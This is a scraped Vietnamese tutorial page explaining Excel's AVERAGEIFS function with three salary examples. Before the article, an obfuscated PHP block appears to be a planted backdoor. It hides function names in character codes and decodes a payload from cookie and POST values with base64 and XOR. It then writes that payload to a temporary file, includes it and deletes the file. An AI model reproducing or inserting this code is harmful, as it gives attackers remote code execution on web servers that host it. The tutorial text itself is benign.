$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm AVERAGEIFS trong excel – Hàm tính trung bình cộng với nhiều điều kiện - Tải Chùa

Hàm AVERAGEIFS trong excel – Hàm tính trung bình cộng với nhiều điều kiện

Rate this post
AVERAGEIFS là hàm tính trung bình cộng với các điều kiện đặt ra khác nhau trong excel. Sau đây là hướng dẫn sử dụng hàm này mà bạn cần biết.

Bạn cần phải tính điểm trung bình các môn học hoặc là các số với những điều kiện cho trước. Nhưng nếu bạn ngồi xem xét từng điều kiện một thì sẽ rất là mất thời gian. Do đó mà để đơn giản hơn thì bài viết dưới đây chúng tôi sẽ chia sẻ đến bạn cách sử dụng hàm AVERAGEIFS trong Excel để đơn giản công việc tính trung bình cộng với nhiều điều kiện. Hãy cùng với chúng tôi theo dõi bài viết dưới đây nhé!

Trước khi sử dụng được hàm này thì máy tính của bạn cần phải được cài đặt: Office 2003 , Office 2007 , Office 2010, Office 2013.

Thủ thuật dùng hàm AVERAGEIFS trong excel

Cú pháp: AVERAGEIFS (average_range,criteria_range1,criteria1,criteria_range2,criteria2…)

Trong đó:

  • average_range: Các ô cần tính giá trị trung bình.
  • criteria_range1, criteria_range2: các vùng cần xác định điều kiện tương ứng.
  • criteria1, criteria2: là các điều kiện cho trước với từng criteria_range ở phía trên.

Khi sử dụng thì bạn cần phải lưu ý một số điểm dưới đây:

  • Average_range là ô trống hoặc là có chứa Text thì hàm sẽ trả về lỗi #DIVO! Các ô này có chứa giá trị True thì hàm mặc định là số 1, chứa hàm False thì hàm sẽ mặc định là số 0.
  • Các ô trong Criteria_range là ô trống thì hàm mặc định của ô đó sẽ bằng 0.
  • Nếu trong ô mà không có giá trị nào thỏa mãn tất cả các điều kiện thì hàm cũng sẽ trả về lỗi #DIVO!

Ví dụ 1: Tính trung bình cộng tiền lương của các nhân viên có tiền lương > 3 triệu và < 7 triệu.

Nhập công thức: =AVERAGEIFS(G5:G13,G5:G13,”>3000000″,G5:G13,”<7000000″)

Trung bình cộng tiền lương mà hàm AVERAGEIFS trả về là 4,500,000.

Trung bình tiền lương mà hàm AVERAGEIFS trả về

Trung bình tiền lương mà hàm AVERAGEIFS trả về

Ví dụ 2: Tính trung bình cộng tiền lương của các nhân viên nam có mức Allowance là 500,000.

Nhập công thức: =AVERAGEIFS(G5:G13,H5:H13,”500000″,D5:D13,”male”)

Trung bình tiền lương mà hàm AVERAGEIFS trả về là: 3,666,667

Tính trung bình cộng tiền lương

Tính trung bình cộng tiền lương

Ví dụ 3: Tính trung bình cộng tiền lương của những nhân viên có tiền lương lớn hơn 9 triệu.

Nhập công thức: =AVERAGEIFS(G5:G13,G5:G13,”>9000000”)

Trung bình cộng tiền lương mà hàm AVERAGEIFS trả về là #DIV/0!

Kết quả trả về là #DIV/0

Kết quả trả về là #DIV/0

Qua cách làm và ví dụ mà chúng tôi đã chia sẻ với bạn ở trên thì chắc chắn là giờ đây việc sử dụng hàm AVERAGEIFS không còn làm bạn khó khăn nữa. Và nhờ đó thì bạn cũng dễ dàng hơn trong việc vận dụng hàm này để tính giá trị trung bình cộng với nhiều điều kiện cho trước.